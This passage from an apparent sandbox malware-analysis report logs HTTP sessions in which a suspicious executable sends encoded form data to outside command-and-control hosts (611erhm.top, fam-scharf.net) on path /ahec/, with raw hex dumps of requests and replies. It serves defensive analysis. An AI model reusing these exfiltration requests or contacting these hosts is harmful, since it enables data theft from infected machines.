6a 41 46 36 65 64 65 57 34 73 6a 39 79 35 32 64 76 44 5a 4d 76 51 34 4c 66 2b 7a 45 73 61 44 46 6b 45 54 64 6b 41 6f 67 46 5a 35 70 52 48 71 33 4b 31 63 63 6a 63 4e 33 35 69 74 67 38 70 39 4a 67 59 58 48 63 6c 58 64 64 66 31 38 45 78 45 31 50 6e 33 36 73 67 48 45 79 53 49 44 48 6f 4b 74 6a 30 71 71 69 32 35 32 2f 54 6f 77 37 38 5a 41 58 69 4c 4f 46 48 6e 77 70 72 52 2b 37 51 76 47 74 46 44 45 78 35 67 54 53 74 42 6a 59 45 70 56 32 53 67 64 70 56 54 4a 31 4d 41 52 52 30 53 32 53 32 30 44 48 48 61 35 38 71 6a 45 33 5a 37 36 63 74 74 57 35 47 63 65 34 6a 74 2b 57 35 76 35 36 36 7a 55 2f 4c 59 70 5a 39 61 4a 50 45 50 33 71 73 31 6e 64 59 4e 30 34 4b 56 50 73 75 2f 2f 35 53 49 4d 6a 55 4a 53 44 43 4a 78 70 64 37 74 37 69 6e 6c 46 72 53 2f 7a 4c 77 6d 37 33 7a 4b 58 6e 41 37 4a 39 37 52 41 56 66 4d 4d 31 79 62 6f 79 36 6e 31 69 37 49 2b 50 65 39 52 72 34 34 43 77 6f 55 39 55 6d 4f 5a 30 6e 52 4d 44 74 68 6f 32 69 67 52 67 38 64 57 48 75 71 74 34 4e 34 65 4f 61 58 5a 64 61 31 52 47 75 6b 6a 76 64 4e 64 48 6f 72 53 35 44 59 44 65 59 30 79 62 6a 39 65 4a 6d 50 72 57 4a 74 45 6a 77 41 50 6a 37 4a 4c 39 63 59 63 69 61 49 39 6c 45 63 6a 54 31 5a 46 6b 61 32 6f 61 55 71 31 62 6e 44 55 6f 6d 44 45 71 48 34 46 32 58 72 5a 73 6f 68 4b 4a 4d 59 78 7a 34 35 6b 41 50 49 4f 64 63 64 35 45 73 78 4c 4f 63 77 55 38 76 68 4c 7a 73 56 78 54 7a 44 44 74 48 49 49 37 6a 51 48 4c 6a 4e 74 30 34 47 72 4f 5a 77 63 4a 2b 74 53 68 36 78 32 77 4a 2b 38 41 31 75 59 4c 76 49 32 4e 73 48 32 4d 42 50 56 4f 69 66 73 6c 38 63 39 78 52 4a 35 65 44 6b 69 4a 4c 7a 42 75 33 57 61 32 72 70 34 66 73 47 75 44 56 4f 30 56 4e 78 45 4e 6b 37 32 4e 73 67 43 76 76 39 52 77 32 46 48 70 50 76 57 44 6c 4f 58 31 43 4b 51 68 4c 4a 6e 76 78 74 6b 46 79 70 6b 74 69 61 63 66 6d 35 6a 67 31 5a 50 39 69 62 47 41 4d 66 42 66 4e 43 68 49 4f 59 4b 73 42 56 46 4b 66 2f 64 79 4e 53 45 2f 4a 48 5a 68 57 4c 65 38 47 2b 72 39 4b 6d 67 54 6a 35 4f 33 4c 6c 79 6d 4c 34 2b 69 70 4d 77 35 4a 79 4e 61 2b 52 61 7a 6c 75 76 73 5a 72 70 77 52 45 44 65 78 75 75 52 6c 61 6d 55 6f 44 47 32 6f 32 61 65 67 71 71 4c 77 64 59 6f 75 78 6e 53 37 31 38 2b 47 5a 6f 4d 42 58 4a 2f 5a 47 6a 79 43 47 59 4a 53 78 68 56 72 6d 30 65 56 34 34 48 4f 38 2f 74 31 6b 6f 43 6d 6a 72 33 4c 38 64 6b 79 38 79 34 78 73 49 64 57 79 6d 30 6c 4d 77 2f 53 4c 32 34 51 56 70 71 4f 34 71 62 65 42 4a 77 70 73 53 44 4c 78 43 67 79 4a 38 62 39 55 5a 71 51 71 4f 78 54 4a 39 33 58 42 4d 62 6e 35 4b 58 67 77 44 6b 55 30 45 4c 43 42 68 59 77 36 61 38 46 79 79 49 66 58 56 57 36 37 73 35 30 69 54 43 2b 50 4d 63 67 5a 53 4b 2f 32 65 4a 78 2f 67 36 61 41 59 50 46 5a 76 6a 31 2f 39 52 4f 6a 70 50 39 35 4f 54 42 38 70 44 49 75 65 76 63 6a 44 6f 64
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:52:09.291145086 CET176INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:09 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 157
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Dec 8, 2023 14:52:09.294420958 CET157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            28192.168.2.44976834.117.26.57805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:11.624073982 CET468OUTGET /ahec/?XveXHZvx=UYUxSke5jkUMcYDNvZduqvCoEnfAlB/5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3pueYDpzLDOPRePOaEw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.611erhm.top
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:52:11.947863102 CET300INHTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.20.2
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:11 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 5208
                                                                                                                                                            Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            ETag: "65267254-1458"
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Dec 8, 2023 14:52:11.961240053 CET1286INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                                                                            Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                                                                                                            Dec 8, 2023 14:52:11.961343050 CET1286INData Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65
                                                                                                                                                            Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                                                                                                            Dec 8, 2023 14:52:11.961360931 CET1286INData Raw: 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c
                                                                                                                                                            Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                                                                                                            Dec 8, 2023 14:52:11.961412907 CET1286INData Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74
                                                                                                                                                            Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                                                                                                            Dec 8, 2023 14:52:11.961487055 CET64INData Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                            Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            29192.168.2.44976981.169.145.70805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:17.612606049 CET744OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Origin: http://www.fam-scharf.net
                                                                                                                                                            Referer: http://www.fam-scharf.net/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 55 62 62 59 39 72 31 46 58 65 48 2f 5a 37 4d 64 78 2b 33 55 61 48 51 37 6d 69 31 35 6f 54 61 6b 30 34 49 30 6f 74 65 63 42 52 53 73 75 61 4c 62 52 6f 54 68 76 54 6c 6a 53 36 48 5a 59 79 44 4a 54 47 35 79 37 58 52 74 46 57 56 43 53 49 65 30 45 6f 4a 76 62 79 44 51 6a 35 4c 6b 50 35 4c 72 74 36 57 42 71 44 41 5a 72 77 47 7a 64 61 75 79 72 58 37 37 4a 4d 48 30 4a 4e 4b 55 50 4d 49 37 5a 30 6d 62 6f 68 34 56 73 45 2b 77 33 35 4d 69 34 34 6c 54 33 74 47 54 61 74 62 43 6f 58 4c 7a 4d 75 70 6c 4e 77 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=kF7Vn6OF0YXrUbbY9r1FXeH/Z7Mdx+3UaHQ7mi15oTak04I0otecBRSsuaLbRoThvTljS6HZYyDJTG5y7XRtFWVCSIe0EoJvbyDQj5LkP5Lrt6WBqDAZrwGzdauyrX77JMH0JNKUPMI7Z0mboh4VsE+w35Mi44lT3tGTatbCoXLzMuplNw==
                                                                                                                                                            Dec 8, 2023 14:52:17.869066000 CET374INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:17 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            30192.168.2.44977081.169.145.70805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:20.392215014 CET764OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Origin: http://www.fam-scharf.net
                                                                                                                                                            Referer: http://www.fam-scharf.net/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 56 37 4c 59 75 62 4a 46 48 4f 48 38 48 72 4d 64 6a 2b 33 51 61 48 55 37 6d 68 35 50 72 68 4f 6b 30 5a 34 30 70 6f 79 63 47 52 53 73 67 36 4c 61 50 59 54 2f 76 54 70 72 53 36 37 5a 59 79 6e 4a 54 45 78 79 75 32 52 71 45 47 56 41 48 59 65 32 4b 49 4a 76 62 79 44 51 6a 35 65 42 50 35 54 72 74 75 71 42 71 69 41 61 33 67 47 38 61 61 75 79 34 48 37 2f 4a 4d 47 62 4a 4d 6d 2b 50 4f 67 37 5a 32 4f 62 70 7a 51 57 6c 45 2b 32 7a 35 4e 33 33 71 35 65 69 66 33 63 4b 4d 4c 2b 6c 6a 6a 6e 41 62 46 32 4b 46 52 62 74 66 71 56 78 2b 66 70 4c 34 66 73 68 53 76 70 73 74 4d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5PrhOk0Z40poycGRSsg6LaPYT/vTprS67ZYynJTExyu2RqEGVAHYe2KIJvbyDQj5eBP5TrtuqBqiAa3gG8aauy4H7/JMGbJMm+POg7Z2ObpzQWlE+2z5N33q5eif3cKML+ljjnAbF2KFRbtfqVx+fpL4fshSvpstM=
                                                                                                                                                            Dec 8, 2023 14:52:20.649234056 CET374INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:20 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            31192.168.2.44977181.169.145.70805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:23.174957037 CET10846OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Origin: http://www.fam-scharf.net
                                                                                                                                                            Referer: http://www.fam-scharf.net/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 56 37 4c 59 75 62 4a 46 48 4f 48 38 48 72 4d 64 6a 2b 33 51 61 48 55 37 6d 68 35 50 72 67 32 6b 31 72 77 30 6d 72 4b 63 48 52 53 73 6f 61 4c 48 50 59 53 36 76 54 78 76 53 36 33 4a 59 77 50 4a 53 68 6c 79 71 79 6c 71 4e 47 56 41 46 59 65 72 45 6f 49 33 62 7a 7a 55 6a 36 6d 42 50 35 54 72 74 76 36 42 6f 7a 41 61 6b 51 47 7a 64 61 75 32 72 58 37 58 4a 4d 66 73 4a 4d 6a 4c 50 2f 41 37 5a 57 65 62 71 47 6b 57 35 55 2b 30 30 35 4d 30 33 71 30 65 69 66 72 2b 4b 4d 2b 6a 6c 68 2f 6e 41 75 30 4f 58 32 68 63 33 4d 71 61 73 71 66 51 50 6f 53 4f 39 6a 50 58 77 4e 6d 49 42 6d 56 53 67 2b 34 49 35 6b 6e 33 6b 32 63 2f 74 6b 34 37 67 63 66 59 34 6d 6b 43 4b 56 5a 6a 5a 76 4d 68 69 66 67 30 64 6b 4d 49 31 78 54 64 57 46 6e 5a 53 4b 7a 55 79 39 35 4f 31 34 50 43 52 4d 53 5a 35 52 2b 51 64 57 66 76 79 71 4d 59 7a 61 33 52 62 55 4a 77 6c 65 5a 6c 2f 50 4f 53 43 6e 77 79 41 69 42 51 36 72 69 74 36 45 73 70 41 47 4e 58 56 43 53 44 79 48 39 35 55 51 50 43 52 35 59 4b 34 62 47 59 39 6e 4e 30 70 45 42 4d 49 44 71 51 6e 30 50 45 42 78 50 72 42 4d 2b 66 49 50 61 75 4c 4b 72 7a 43 65 58 77 4a 46 50 30 4e 4c 6a 2f 59 50 45 35 38 6d 66 79 5a 37 61 78 54 69 75 4d 58 66 63 4b 61 31 6d 34 55 32 4b 69 6c 68 4d 66 69 58 55 78 48 55 51 4e 77 55 71 79 6e 45 6a 52 6c 45 52 34 39 72 68 55 6a 4a 67 51 47 34 73 63 52 45 53 42 66 30 31 66 4d 57 72 55 65 63 63 42 78 55 42 36 61 48 37 64 36 68 5a 2b 4d 4e 74 4b 35 71 79 43 33 53 2b 31 58 57 73 61 5a 68 30 66 34 74 49 59 54 37 6a 56 48 57 78 77 30 34 32 36 61 58 45 4a 32 74 61 35 4e 6d 35 4a 4a 2b 4b 50 4a 4e 61 5a 68 6c 49 72 75 69 61 49 6d 76 56 50 41 6f 79 52 69 54 70 34 59 45 41 4a 61 73 52 